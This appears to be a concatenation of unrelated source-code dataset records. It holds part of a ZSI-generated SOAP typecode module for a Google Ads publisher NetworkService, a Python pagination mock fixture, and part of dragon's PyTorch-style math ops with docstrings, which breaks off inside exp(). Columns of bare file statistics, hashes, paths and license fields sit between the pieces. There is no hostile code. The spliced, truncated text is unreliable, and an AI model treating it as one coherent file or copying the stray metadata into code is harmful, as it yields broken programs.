TClist = [ZSI.TC.String(pname=(ns,"authToken"), aname="_authToken", minOccurs=0, maxOccurs=1, nillable=True, typed=False, encoded=kw.get("encoded")), ZSI.TC.String(pname=(ns,"networkCode"), aname="_networkCode", minOccurs=0, maxOccurs=1, nillable=True, typed=False, encoded=kw.get("encoded")), ZSI.TC.String(pname=(ns,"applicationName"), aname="_applicationName", minOccurs=0, maxOccurs=1, nillable=True, typed=False, encoded=kw.get("encoded")), ZSI.TC.String(pname=(ns,"oAuthToken"), aname="_oAuthToken", minOccurs=0, maxOccurs=1, nillable=True, typed=False, encoded=kw.get("encoded"))]
self.attribute_typecode_dict = attributes or {}
if extend: TClist += ofwhat
if restrict: TClist = ofwhat
ZSI.TCcompound.ComplexType.__init__(self, None, TClist, pname=pname, inorder=0, **kw)
class Holder:
typecode = self
def __init__(self):
# pyclass
self._authToken = None
self._networkCode = None
self._applicationName = None
self._oAuthToken = None
return
Holder.__name__ = "SoapRequestHeader_Holder"
self.pyclass = Holder
class ApiError_Def(ZSI.TCcompound.ComplexType, TypeDefinition):
schema = "https://www.google.com/apis/ads/publisher/v201010"
type = (schema, "ApiError")
def __init__(self, pname, ofwhat=(), attributes=None, extend=False, restrict=False, **kw):
ns = ns0.ApiError_Def.schema
TClist = [ZSI.TC.String(pname=(ns,"fieldPath"), aname="_fieldPath", minOccurs=0, maxOccurs=1, nillable=True, typed=False, encoded=kw.get("encoded")), ZSI.TC.String(pname=(ns,"trigger"), aname="_trigger", minOccurs=0, maxOccurs=1, nillable=True, typed=False, encoded=kw.get("encoded")), ZSI.TC.String(pname=(ns,"errorString"), aname="_errorString", minOccurs=0, maxOccurs=1, nillable=True, typed=False, encoded=kw.get("encoded")), ZSI.TC.String(pname=(ns,"ApiError.Type"), aname="_ApiError_Type", minOccurs=0, maxOccurs=1, nillable=True, typed=False, encoded=kw.get("encoded"))]
self.attribute_typecode_dict = attributes or {}
if extend: TClist += ofwhat
if restrict: TClist = ofwhat
ZSI.TCcompound.ComplexType.__init__(self, None, TClist, pname=pname, inorder=0, **kw)
class Holder:
typecode = self
def __init__(self):
# pyclass
self._fieldPath = None
self._trigger = None
self._errorString = None
self._ApiError_Type = None
return
Holder.__name__ = "ApiError_Holder"
self.pyclass = Holder
class ApiException_Def(TypeDefinition):
#complexType/complexContent extension
schema = "https://www.google.com/apis/ads/publisher/v201010"
type = (schema, "ApiException")
def __init__(self, pname, ofwhat=(), extend=False, restrict=False, attributes=None, **kw):
ns = ns0.ApiException_Def.schema
TClist = [GTD("https://www.google.com/apis/ads/publisher/v201010","ApiError",lazy=False)(pname=(ns,"errors"), aname="_errors", minOccurs=0, maxOccurs="unbounded", nillable=True, typed=False, encoded=kw.get("encoded"))]
attributes = self.attribute_typecode_dict = attributes or {}
if extend: TClist += ofwhat
if restrict: TClist = ofwhat
if ns0.ApplicationException_Def not in ns0.ApiException_Def.__bases__:
bases = list(ns0.ApiException_Def.__bases__)
bases.insert(0, ns0.ApplicationException_Def)
ns0.ApiException_Def.__bases__ = tuple(bases)
ns0.ApplicationException_Def.__init__(self, pname, ofwhat=TClist, extend=True, attributes=attributes, **kw)
class ApplicationException_Def(ZSI.TCcompound.ComplexType, TypeDefinition):
schema = "https://www.google.com/apis/ads/publisher/v201010"
type = (schema, "ApplicationException")
def __init__(self, pname, ofwhat=(), attributes=None, extend=False, restrict=False, **kw):
ns = ns0.ApplicationException_Def.schema
TClist = [ZSI.TC.String(pname=(ns,"message"), aname="_message", minOccurs=0, maxOccurs=1, nillable=True, typed=False, encoded=kw.get("encoded")), ZSI.TC.String(pname=(ns,"ApplicationException.Type"), aname="_ApplicationException_Type", minOccurs=0, maxOccurs=1, nillable=True, typed=False, encoded=kw.get("encoded"))]
self.attribute_typecode_dict = attributes or {}
if extend: TClist += ofwhat
if restrict: TClist = ofwhat
ZSI.TCcompound.ComplexType.__init__(self, None, TClist, pname=pname, inorder=0, **kw)
class Holder:
typecode = self
def __init__(self):
# pyclass
self._message = None
self._ApplicationException_Type = None
return
Holder.__name__ = "ApplicationException_Holder"
self.pyclass = Holder
class ApiVersionError_Reason_Def(ZSI.TC.String, TypeDefinition):
schema = "https://www.google.com/apis/ads/publisher/v201010"
type = (schema, "ApiVersionError.Reason")
def __init__(self, pname, **kw):
ZSI.TC.String.__init__(self, pname, pyclass=None, **kw)
class Holder(str):
typecode = self
self.pyclass = Holder
class AuthenticationError_Reason_Def(ZSI.TC.String, TypeDefinition):
schema = "https://www.google.com/apis/ads/publisher/v201010"
type = (schema, "AuthenticationError.Reason")
def __init__(self, pname, **kw):
ZSI.TC.String.__init__(self, pname, pyclass=None, **kw)
class Holder(str):
typecode = self
self.pyclass = Holder
class CommonError_Reason_Def(ZSI.TC.String, TypeDefinition):
schema = "https://www.google.com/apis/ads/publisher/v201010"
type = (schema, "CommonError.Reason")
def __init__(self, pname, **kw):
ZSI.TC.String.__init__(self, pname, pyclass=None, **kw)
class Holder(str):
typecode = self
self.pyclass = Holder
class InternalApiError_Reason_Def(ZSI.TC.String, TypeDefinition):
schema = "https://www.google.com/apis/ads/publisher/v201010"
type = (schema, "InternalApiError.Reason")
def __init__(self, pname, **kw):
ZSI.TC.String.__init__(self, pname, pyclass=None, **kw)
class Holder(str):
typecode = self
self.pyclass = Holder
class NotNullError_Reason_Def(ZSI.TC.String, TypeDefinition):
schema = "https://www.google.com/apis/ads/publisher/v201010"
type = (schema, "NotNullError.Reason")
def __init__(self, pname, **kw):
ZSI.TC.String.__init__(self, pname, pyclass=None, **kw)
class Holder(str):
typecode = self
self.pyclass = Holder
class ParseError_Reason_Def(ZSI.TC.String, TypeDefinition):
schema = "https://www.google.com/apis/ads/publisher/v201010"
type = (schema, "ParseError.Reason")
def __init__(self, pname, **kw):
ZSI.TC.String.__init__(self, pname, pyclass=None, **kw)
class Holder(str):
typecode = self
self.pyclass = Holder
class PermissionError_Reason_Def(ZSI.TC.String, TypeDefinition):
schema = "https://www.google.com/apis/ads/publisher/v201010"
type = (schema, "PermissionError.Reason")
def __init__(self, pname, **kw):
ZSI.TC.String.__init__(self, pname, pyclass=None, **kw)
class Holder(str):
typecode = self
self.pyclass = Holder
class QuotaError_Reason_Def(ZSI.TC.String, TypeDefinition):
schema = "https://www.google.com/apis/ads/publisher/v201010"
type = (schema, "QuotaError.Reason")
def __init__(self, pname, **kw):
ZSI.TC.String.__init__(self, pname, pyclass=None, **kw)
class Holder(str):
typecode = self
self.pyclass = Holder
class RequiredError_Reason_Def(ZSI.TC.String, TypeDefinition):
schema = "https://www.google.com/apis/ads/publisher/v201010"
type = (schema, "RequiredError.Reason")
def __init__(self, pname, **kw):
ZSI.TC.String.__init__(self, pname, pyclass=None, **kw)
class Holder(str):
typecode = self
self.pyclass = Holder
class ServerError_Reason_Def(ZSI.TC.String, TypeDefinition):
schema = "https://www.google.com/apis/ads/publisher/v201010"
type = (schema, "ServerError.Reason")
def __init__(self, pname, **kw):
ZSI.TC.String.__init__(self, pname, pyclass=None, **kw)
class Holder(str):
typecode = self
self.pyclass = Holder
class StatementError_Reason_Def(ZSI.TC.String, TypeDefinition):
schema = "https://www.google.com/apis/ads/publisher/v201010"
type = (schema, "StatementError.Reason")
def __init__(self, pname, **kw):
ZSI.TC.String.__init__(self, pname, pyclass=None, **kw)
class Holder(str):
typecode = self
self.pyclass = Holder
class getAllNetworks_Dec(ZSI.TCcompound.ComplexType, ElementDeclaration):
literal = "getAllNetworks"
schema = "https://www.google.com/apis/ads/publisher/v201010"
def __init__(self, **kw):
ns = ns0.getAllNetworks_Dec.schema
TClist = []
kw["pname"] = ("https://www.google.com/apis/ads/publisher/v201010","getAllNetworks")
kw["aname"] = "_getAllNetworks"
self.attribute_typecode_dict = {}
ZSI.TCcompound.ComplexType.__init__(self,None,TClist,inorder=0,**kw)
class Holder:
typecode = self
def __init__(self):
# pyclass
return
Holder.__name__ = "getAllNetworks_Holder"
self.pyclass = Holder
class getAllNetworksResponse_Dec(ZSI.TCcompound.ComplexType, ElementDeclaration):
literal = "getAllNetworksResponse"
schema = "https://www.google.com/apis/ads/publisher/v201010"
def __init__(self, **kw):
ns = ns0.getAllNetworksResponse_Dec.schema
TClist = [GTD("https://www.google.com/apis/ads/publisher/v201010","Network",lazy=False)(pname=(ns,"rval"), aname="_rval", minOccurs=0, maxOccurs="unbounded", nillable=True, typed=False, encoded=kw.get("encoded"))]
kw["pname"] = ("https://www.google.com/apis/ads/publisher/v201010","getAllNetworksResponse")
kw["aname"] = "_getAllNetworksResponse"
self.attribute_typecode_dict = {}
ZSI.TCcompound.ComplexType.__init__(self,None,TClist,inorder=0,**kw)
class Holder:
typecode = self
def __init__(self):
# pyclass
self._rval = []
return
Holder.__name__ = "getAllNetworksResponse_Holder"
self.pyclass = Holder
class ApiExceptionFault_Dec(ElementDeclaration):
literal = "ApiExceptionFault"
schema = "https://www.google.com/apis/ads/publisher/v201010"
def __init__(self, **kw):
kw["pname"] = ("https://www.google.com/apis/ads/publisher/v201010","ApiExceptionFault")
kw["aname"] = "_ApiExceptionFault"
if ns0.ApiException_Def not in ns0.ApiExceptionFault_Dec.__bases__:
bases = list(ns0.ApiExceptionFault_Dec.__bases__)
bases.insert(0, ns0.ApiException_Def)
ns0.ApiExceptionFault_Dec.__bases__ = tuple(bases)
ns0.ApiException_Def.__init__(self, **kw)
if self.pyclass is not None: self.pyclass.__name__ = "ApiExceptionFault_Dec_Holder"
class getCurrentNetwork_Dec(ZSI.TCcompound.ComplexType, ElementDeclaration):
literal = "getCurrentNetwork"
schema = "https://www.google.com/apis/ads/publisher/v201010"
def __init__(self, **kw):
ns = ns0.getCurrentNetwork_Dec.schema
TClist = []
kw["pname"] = ("https://www.google.com/apis/ads/publisher/v201010","getCurrentNetwork")
kw["aname"] = "_getCurrentNetwork"
self.attribute_typecode_dict = {}
ZSI.TCcompound.ComplexType.__init__(self,None,TClist,inorder=0,**kw)
class Holder:
typecode = self
def __init__(self):
# pyclass
return
Holder.__name__ = "getCurrentNetwork_Holder"
self.pyclass = Holder
class getCurrentNetworkResponse_Dec(ZSI.TCcompound.ComplexType, ElementDeclaration):
literal = "getCurrentNetworkResponse"
schema = "https://www.google.com/apis/ads/publisher/v201010"
def __init__(self, **kw):
ns = ns0.getCurrentNetworkResponse_Dec.schema
TClist = [GTD("https://www.google.com/apis/ads/publisher/v201010","Network",lazy=False)(pname=(ns,"rval"), aname="_rval", minOccurs=0, maxOccurs=1, nillable=True, typed=False, encoded=kw.get("encoded"))]
kw["pname"] = ("https://www.google.com/apis/ads/publisher/v201010","getCurrentNetworkResponse")
kw["aname"] = "_getCurrentNetworkResponse"
self.attribute_typecode_dict = {}
ZSI.TCcompound.ComplexType.__init__(self,None,TClist,inorder=0,**kw)
class Holder:
typecode = self
def __init__(self):
# pyclass
self._rval = None
return
Holder.__name__ = "getCurrentNetworkResponse_Holder"
self.pyclass = Holder
class updateNetwork_Dec(ZSI.TCcompound.ComplexType, ElementDeclaration):
literal = "updateNetwork"
schema = "https://www.google.com/apis/ads/publisher/v201010"
def __init__(self, **kw):
ns = ns0.updateNetwork_Dec.schema
TClist = [GTD("https://www.google.com/apis/ads/publisher/v201010","Network",lazy=False)(pname=(ns,"network"), aname="_network", minOccurs=0, maxOccurs=1, nillable=True, typed=False, encoded=kw.get("encoded"))]
kw["pname"] = ("https://www.google.com/apis/ads/publisher/v201010","updateNetwork")
kw["aname"] = "_updateNetwork"
self.attribute_typecode_dict = {}
ZSI.TCcompound.ComplexType.__init__(self,None,TClist,inorder=0,**kw)
class Holder:
typecode = self
def __init__(self):
# pyclass
self._network = None
return
Holder.__name__ = "updateNetwork_Holder"
self.pyclass = Holder
class updateNetworkResponse_Dec(ZSI.TCcompound.ComplexType, ElementDeclaration):
literal = "updateNetworkResponse"
schema = "https://www.google.com/apis/ads/publisher/v201010"
def __init__(self, **kw):
ns = ns0.updateNetworkResponse_Dec.schema
TClist = [GTD("https://www.google.com/apis/ads/publisher/v201010","Network",lazy=False)(pname=(ns,"rval"), aname="_rval", minOccurs=0, maxOccurs=1, nillable=True, typed=False, encoded=kw.get("encoded"))]
kw["pname"] = ("https://www.google.com/apis/ads/publisher/v201010","updateNetworkResponse")
kw["aname"] = "_updateNetworkResponse"
self.attribute_typecode_dict = {}
ZSI.TCcompound.ComplexType.__init__(self,None,TClist,inorder=0,**kw)
class Holder:
typecode = self
def __init__(self):
# pyclass
self._rval = None
return
Holder.__name__ = "updateNetworkResponse_Holder"
self.pyclass = Holder
class RequestHeader_Dec(ElementDeclaration):
literal = "RequestHeader"
schema = "https://www.google.com/apis/ads/publisher/v201010"
def __init__(self, **kw):
kw["pname"] = ("https://www.google.com/apis/ads/publisher/v201010","RequestHeader")
kw["aname"] = "_RequestHeader"
if ns0.SoapRequestHeader_Def not in ns0.RequestHeader_Dec.__bases__:
bases = list(ns0.RequestHeader_Dec.__bases__)
bases.insert(0, ns0.SoapRequestHeader_Def)
ns0.RequestHeader_Dec.__bases__ = tuple(bases)
ns0.SoapRequestHeader_Def.__init__(self, **kw)
if self.pyclass is not None: self.pyclass.__name__ = "RequestHeader_Dec_Holder"
class ResponseHeader_Dec(ElementDeclaration):
literal = "ResponseHeader"
schema = "https://www.google.com/apis/ads/publisher/v201010"
def __init__(self, **kw):
kw["pname"] = ("https://www.google.com/apis/ads/publisher/v201010","ResponseHeader")
kw["aname"] = "_ResponseHeader"
if ns0.SoapResponseHeader_Def not in ns0.ResponseHeader_Dec.__bases__:
bases = list(ns0.ResponseHeader_Dec.__bases__)
bases.insert(0, ns0.SoapResponseHeader_Def)
ns0.ResponseHeader_Dec.__bases__ = tuple(bases)
ns0.SoapResponseHeader_Def.__init__(self, **kw)
if self.pyclass is not None: self.pyclass.__name__ = "ResponseHeader_Dec_Holder"
# end class ns0 (tns: https://www.google.com/apis/ads/publisher/v201010)
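# --- Usage sketch (illustrative; not part of the generated module) ---
# These typecodes are normally consumed via the companion
# NetworkService_services.py binding, but an element declaration
# registered above can also be resolved directly:
#
#   from ZSI.schema import GED
#   tc = GED("https://www.google.com/apis/ads/publisher/v201010",
#            "getAllNetworks")   # declared by getAllNetworks_Dec above
#   request = tc.pyclass()       # empty request holder, ready to serialize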
| 57.701493
| 1,029
| 0.631086
| 3,730
| 34,794
| 5.644772
| 0.034316
| 0.033056
| 0.043885
| 0.053289
| 0.835051
| 0.773308
| 0.75184
| 0.75184
| 0.742104
| 0.721016
| 0
| 0.023248
| 0.240932
| 34,794
| 602
| 1,030
| 57.797342
| 0.773958
| 0.021958
| 0
| 0.547059
| 1
| 0
| 0.167499
| 0.024114
| 0
| 0
| 0
| 0
| 0
| 1
| 0.096078
| false
| 0
| 0.005882
| 0.003922
| 0.245098
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
f76acc881f9a49f22f6eeaeba9e6b78a515b1b65
| 916
|
py
|
Python
|
chris/tests/mocks/data/pagination.py
|
FNNDSC/caw
|
a41761c4502481f6ccb60ef6e9956464c9b30eb9
|
[
"MIT"
] | null | null | null |
chris/tests/mocks/data/pagination.py
|
FNNDSC/caw
|
a41761c4502481f6ccb60ef6e9956464c9b30eb9
|
[
"MIT"
] | 11
|
2021-04-23T21:25:29.000Z
|
2022-03-14T02:40:26.000Z
|
chris/tests/mocks/data/pagination.py
|
FNNDSC/caw
|
a41761c4502481f6ccb60ef6e9956464c9b30eb9
|
[
"MIT"
] | 1
|
2021-10-17T16:18:30.000Z
|
2021-10-17T16:18:30.000Z
|
responses = {
'https://example.com/api/v1/something/': {
'count': 5,
'next': 'https://example.com/api/v1/something/?limit=3&offset=3',
'previous': None,
'results': [
{'id': 1}, {'id': 2}, {'id': 3}
],
'collection_links': {}
},
'https://example.com/api/v1/something/?limit=3&offset=3': {
'count': 5,
'next': 'https://example.com/api/v1/something/?limit=3&offset=6',
'previous': 'https://example.com/api/v1/something/?limit=3',
'results': [
{'id': 4}, {'id': 5}, {'id': 6}
],
'collection_links': {}
},
'https://example.com/api/v1/something/?limit=3&offset=6': {
'count': 5,
'next': None,
'previous': 'https://example.com/api/v1/something/?limit=3',
'results': [
{'id': 7}, {'id': 8}
],
'collection_links': {}
},
}
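# --- Test-helper sketch (not part of the original fixture; the helper name
# is illustrative) ---
# Walk the chain of 'next' links in the mock pages above and collect every
# result id, the same way a paginated-client test would.
def _collect_ids(url):
    ids = []
    while url is not None:
        page = responses[url]  # stands in for an HTTP GET of the API page
        ids.extend(item['id'] for item in page['results'])
        url = page['next']
    return ids

# _collect_ids('https://example.com/api/v1/something/')
# == [1, 2, 3, 4, 5, 6, 7, 8]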
| 30.533333
| 73
| 0.470524
| 102
| 916
| 4.196078
| 0.245098
| 0.196262
| 0.245327
| 0.294393
| 0.820093
| 0.820093
| 0.752336
| 0.752336
| 0.752336
| 0.752336
| 0
| 0.043077
| 0.290393
| 916
| 29
| 74
| 31.586207
| 0.615385
| 0
| 0
| 0.482759
| 0
| 0
| 0.522926
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
e3902aedb74095cdf76b9f64f401c524945c425d
| 38,575
|
py
|
Python
|
torch/core/ops/math_ops.py
|
seetaresearch/dragon
|
fb47d86f5def9bbcc7f374800bf85e74111ae4b4
|
[
"BSD-2-Clause"
] | 30
|
2020-06-22T11:43:28.000Z
|
2022-03-23T02:33:39.000Z
|
torch/core/ops/math_ops.py
|
seetaresearch/dragon
|
fb47d86f5def9bbcc7f374800bf85e74111ae4b4
|
[
"BSD-2-Clause"
] | 1
|
2020-11-05T10:15:33.000Z
|
2020-11-05T10:15:33.000Z
|
torch/core/ops/math_ops.py
|
seetaresearch/dragon
|
fb47d86f5def9bbcc7f374800bf85e74111ae4b4
|
[
"BSD-2-Clause"
] | 4
|
2020-11-05T09:15:03.000Z
|
2021-04-01T02:30:38.000Z
|
# ------------------------------------------------------------
# Copyright (c) 2017-present, SeetaTech, Co.,Ltd.
#
# Licensed under the BSD 2-Clause License.
# You should have received a copy of the BSD 2-Clause License
# along with the software. If not, See,
#
# <https://opensource.org/licenses/BSD-2-Clause>
#
# ------------------------------------------------------------
"""Math ops."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from dragon.core.util import nest
from dragon.vm.torch.core.autograd.function import Function
from dragon.vm.torch.core.ops import constant_ops
def abs(input, out=None):
r"""Compute the absolute value of input.
.. math:: \text{out} = \left| \text{input} \right|
Examples:
```python
print(torch.abs(torch.tensor([-1, 0, 1]))) # [1, 0, 1]
```
Parameters
----------
input : dragon.vm.torch.Tensor
The input tensor.
out : dragon.vm.torch.Tensor, optional
The output tensor.
Returns
-------
dragon.vm.torch.Tensor
The output tensor.
"""
return _unary_func(input, 'Abs', out)
def add(input, other, out=None):
r"""Compute the element-wise addition.
.. math:: \text{out} = \text{input} + \text{other}
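Examples:
```python
a = torch.tensor([1, 2, 3])
print(torch.add(a, 1))  # [2, 3, 4]
print(torch.add(a, a))  # [2, 4, 6]
```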
Parameters
----------
input : dragon.vm.torch.Tensor
The input tensor.
other : Union[dragon.vm.torch.Tensor, number]
The tensor to add.
out : dragon.vm.torch.Tensor, optional
The output tensor.
Returns
-------
dragon.vm.torch.Tensor
The output tensor.
"""
return _binary_func(input, other, 'Add', out)
def addmm(input, mat1, mat2, beta=1, alpha=1, out=None):
r"""Add input to the result of matrix-matrix multiplication.
.. math:: \text{out} = \alpha (\text{mat1} \times \text{mat2}) + \beta \text{input}
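Examples:
```python
a = torch.ones(2, 3)
b = torch.ones(3, 4)
c = torch.ones(2, 4)
print(torch.addmm(c, a, b))  # a (2, 4) tensor filled with 4.
```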
Parameters
----------
input : dragon.vm.torch.Tensor
The input tensor.
mat1 : dragon.vm.torch.Tensor
The first matrix.
mat2 : dragon.vm.torch.Tensor
The second matrix.
beta : float, optional, default=1
The value to :math:`\beta`.
alpha : float, optional, default=1
The value to :math:`\alpha`.
out : dragon.vm.torch.Tensor, optional
The output tensor.
Returns
-------
dragon.vm.torch.Tensor
The output tensor.
"""
return Function.apply(
'Gemm', input.device, [mat1, mat2, input], outputs=[out],
alpha=float(alpha), beta=float(beta))
def argmax(input, dim, keepdim=False, out=None):
"""Return the index of maximum elements along the given dimension.
:attr:`dim` could be negative:
```python
# A negative dimension is the last-k dimension
x = torch.tensor([[1, 2, 3], [4, 5, 6]])
print(torch.argmax(x, dim=1))
print(torch.argmax(x, dim=-1)) # Equivalent
```
Parameters
----------
input : dragon.vm.torch.Tensor
The input tensor.
dim : int
The dimension to reduce.
keepdim : bool, optional, default=False
Keep the reduced dimension or not.
out : dragon.vm.torch.Tensor, optional
The output tensor.
Returns
-------
dragon.vm.torch.Tensor
The index of maximum elements.
"""
return Function.apply(
'ArgMax', input.device, [input], outputs=[out],
axis=dim, keepdims=keepdim)
def argmin(input, dim, keepdim=False, out=None):
"""Return the index of minimum elements along the given dimension.
:attr:`dim` could be negative:
```python
# A negative dimension is the last-k dimension
x = torch.tensor([[1, 2, 3], [4, 5, 6]])
print(torch.argmin(x, dim=1))
print(torch.argmin(x, dim=-1)) # Equivalent
```
Parameters
----------
input : dragon.vm.torch.Tensor
The input tensor.
dim : int, optional
The dimension to reduce.
keepdim : bool, optional, default=False
Keep the reduced dimension or not.
out : dragon.vm.torch.Tensor, optional
The output tensor.
Returns
-------
dragon.vm.torch.Tensor
The index of minimum elements.
"""
return Function.apply(
'ArgMin', input.device, [input], outputs=[out],
axis=dim, keepdims=keepdim)
def baddbmm(input, batch1, batch2, beta=1, alpha=1, out=None):
r"""Add input to the result of batched matrix-matrix multiplication.
.. math::
\text{out}_{i} = \alpha (\text{mat1}_{i} \times \text{mat2}_{i}) +
\beta \text{input}_{i}
Parameters
----------
input : dragon.vm.torch.Tensor
The input tensor.
batch1 : dragon.vm.torch.Tensor
The first batch of matrices.
batch2 : dragon.vm.torch.Tensor
The second batch of matrices.
beta : float, optional, default=1
The value to :math:`\beta`.
alpha : float, optional, default=1
The value to :math:`\alpha`.
out : dragon.vm.torch.Tensor, optional
The output tensor.
Returns
-------
dragon.vm.torch.Tensor
The output tensor.
"""
input1 = bmm(batch1, batch2)
input2 = input * beta if beta != 1 else input
input1 = input1 * alpha if alpha != 1 else input1
return add(input1, input2, out)
def bitwise_and(input, other, out=None):
r"""Compute the element-wise AND bitwise operation.
.. math:: \text{out} = \text{input} \mathbin{\&} \text{other}
Examples:
```python
a = torch.tensor([0, -1, 2, -3, 4])
b = torch.tensor([-4, 3, -2, 1, 0])
print(torch.bitwise_and(a, b)) # [0, 3, 2, 1, 0]
```
Parameters
----------
input : dragon.vm.torch.Tensor
The first input tensor.
other : dragon.vm.torch.Tensor
The second input tensor.
out : dragon.vm.torch.Tensor, optional
The output tensor.
Returns
-------
dragon.vm.torch.Tensor
The output tensor.
"""
return _binary_func(input, other, 'BitwiseAnd', out)
def bitwise_not(input, out=None):
r"""Compute the element-wise NOT bitwise operation.
.. math:: \text{out} = \,\,\sim \text{input}
Examples:
```python
# Typically, ``x`` is a bool tensor
print(torch.bitwise_not(torch.tensor([0, 1], 'bool'))) # [True, False]
# Otherwise, integral types are required (unsigned or signed)
# 00001101 (13) -> 11110010 (?)
print(torch.bitwise_not(torch.tensor(13, 'uint8'))) # 242
print(torch.bitwise_not(torch.tensor(13, 'int8'))) # -14
```
Parameters
----------
input : dragon.vm.torch.Tensor
The input tensor.
out : dragon.vm.torch.Tensor, optional
The output tensor.
Returns
-------
dragon.vm.torch.Tensor
The output tensor.
"""
return _unary_func(input, 'BitwiseNot', out)
def bitwise_or(input, other, out=None):
r"""Compute the element-wise OR bitwise operation.
.. math:: \text{out} = \text{input} \mathbin{|} \text{other}
Examples:
```python
a = torch.tensor([0, -1, 2, -3, 4])
b = torch.tensor([-4, 3, -2, 1, 0])
print(torch.bitwise_or(a, b)) # [-4, -1, -2, -3, 4]
```
Parameters
----------
input : dragon.vm.torch.Tensor
The first input tensor.
other : dragon.vm.torch.Tensor
The second input tensor.
out : dragon.vm.torch.Tensor, optional
The output tensor.
Returns
-------
dragon.vm.torch.Tensor
The output tensor.
"""
return _binary_func(input, other, 'BitwiseOr', out)
def bitwise_xor(input, other, out=None):
r"""Compute the element-wise XOR bitwise operation.
.. math:: \text{out} = \text{input} \oplus \text{other}
Examples:
```python
a = torch.tensor([0, -1, 2, -3, 4])
b = torch.tensor([-4, 3, -2, 1, 0])
print(torch.bitwise_xor(a, b)) # [-4, -4, -4, -4, 4]
```
Parameters
----------
input : dragon.vm.torch.Tensor
The first input tensor.
other : dragon.vm.torch.Tensor
The second input tensor.
out : dragon.vm.torch.Tensor, optional
The output tensor.
Returns
-------
dragon.vm.torch.Tensor
The output tensor.
"""
return _binary_func(input, other, 'BitwiseXor', out)
def bmm(input, mat2, out=None):
r"""Compute the batched matrix-matrix multiplication.
.. math:: \text{out}_{i} = \text{input}_{i} \times \text{mat2}_{i}
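Examples:
```python
a = torch.ones(2, 3, 4)
b = torch.ones(2, 4, 5)
print(torch.bmm(a, b))  # a (2, 3, 5) tensor filled with 4.
```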
Parameters
----------
input : dragon.vm.torch.Tensor
The first batch of matrices.
mat2 : dragon.vm.torch.Tensor
The second batch of matrices.
out : dragon.vm.torch.Tensor, optional
The output tensor.
Returns
-------
dragon.vm.torch.Tensor
The output tensor.
"""
return Function.apply(
'MatMul', input.device, [input, mat2], outputs=[out])
def cast(input, dtype='float32', out=None):
"""Cast the data type of input.
Parameters
----------
input : dragon.vm.torch.Tensor
The input.
dtype : str, optional, default='float32'
The data type to cast to.
out : dragon.vm.torch.Tensor, optional
The output tensor.
Returns
-------
dragon.vm.torch.Tensor
The output tensor.
"""
return Function.apply(
'Cast', input.device, [input], outputs=[out], dtype=dtype)
def ceil(input, out=None):
r"""Compute the smallest integer not less than input.
.. math:: \text{out} = \lceil \text{input} \rceil
Examples:
```python
x = torch.tensor([1.4, 1.7, 2.0])
print(torch.ceil(x)) # [2., 2., 2.]
```
Parameters
----------
input : dragon.vm.torch.Tensor
The input tensor.
out : dragon.vm.torch.Tensor, optional
The output tensor.
Returns
-------
dragon.vm.torch.Tensor
The output tensor.
"""
return _unary_func(input, 'Ceil', out)
def clamp(input, min=None, max=None, out=None):
r"""Compute the clipped input according to the given bounds.
.. math:: \text{out} = \min(\max(\text{input}, low), high)
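Examples:
```python
x = torch.tensor([-1., 0.5, 2.])
print(torch.clamp(x, min=0., max=1.))  # [0., 0.5, 1.]
```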
Parameters
----------
input : dragon.vm.torch.Tensor
The input tensor.
min : number, optional
The min value.
max : number, optional
The max value.
out : dragon.vm.torch.Tensor, optional
The output tensor.
Returns
-------
dragon.vm.torch.Tensor
The output tensor.
"""
low = float(min) if min is not None else None
high = float(max) if max is not None else None
return Function.apply(
'Clip', input.device, [input], outputs=[out], low=low, high=high)
def cos(input, out=None):
r"""Compute the cosine of input.
.. math:: \text{out} = \cos(\text{input})
Examples:
```python
x = torch.tensor([0., math.pi])
print(torch.cos(x)) # [1., -1.]
```
Parameters
----------
input : dragon.vm.torch.Tensor
The input tensor.
out : dragon.vm.torch.Tensor, optional
The output tensor.
Returns
-------
dragon.vm.torch.Tensor
The output tensor.
"""
return _unary_func(input, 'Cos', out)
def cumsum(input, dim, out=None):
"""Compute the cumulative sum of elements along the given dimension.
:attr:`dim` could be negative:
```python
# A negative dimension is the last-k dimension
x = torch.tensor([[1, 2, 3], [4, 5, 6]])
print(torch.cumsum(x, dim=1)) # [[1, 3, 6], [4, 9, 15]]
print(torch.cumsum(x, dim=-1)) # Equivalent
```
Parameters
----------
input : dragon.vm.torch.Tensor
The input tensor.
dim : int
The cumulative dimension.
out : dragon.vm.torch.Tensor, optional
The output tensor.
Returns
-------
dragon.vm.torch.Tensor
The output tensor.
"""
return Function.apply(
'CumSum', input.device, [input], outputs=[out], axis=dim)
def div(input, other, out=None):
r"""Compute the element-wise division.
.. math:: \text{out} = \text{input} \div \text{other}
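Examples:
```python
a = torch.tensor([2., 4., 6.])
print(torch.div(a, 2))  # [1., 2., 3.]
```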
Parameters
----------
input : dragon.vm.torch.Tensor
The input tensor.
other : Union[dragon.vm.torch.Tensor, number]
The tensor to divide.
out : dragon.vm.torch.Tensor, optional
The output tensor.
Returns
-------
dragon.vm.torch.Tensor
The output tensor.
"""
return _binary_func(input, other, 'Div', out)
def eq(input, other, out=None):
r"""Compute the element-wise equal comparison.
.. math:: \text{out} = (\text{input} == \text{other})
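Examples:
```python
a = torch.tensor([1, 2, 3])
b = torch.tensor([1, 0, 3])
print(torch.eq(a, b))  # [True, False, True]
```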
Parameters
----------
input : dragon.vm.torch.Tensor
The input tensor.
other : Union[dragon.vm.torch.Tensor, number]
The tensor to compare.
out : dragon.vm.torch.Tensor, optional
The output tensor.
Returns
-------
dragon.vm.torch.Tensor
The output tensor.
"""
return _binary_func(input, other, 'Equal', out)
def exp(input, out=None):
r"""Compute the exponential of input.
.. math:: \text{out} = \exp(\text{input})
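Examples:
```python
x = torch.tensor([0., 1.])
print(torch.exp(x))  # [1., 2.71828...]
```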
Parameters
----------
input : dragon.vm.torch.Tensor
The input tensor.
out : dragon.vm.torch.Tensor, optional
The output tensor.
Returns
-------
dragon.vm.torch.Tensor
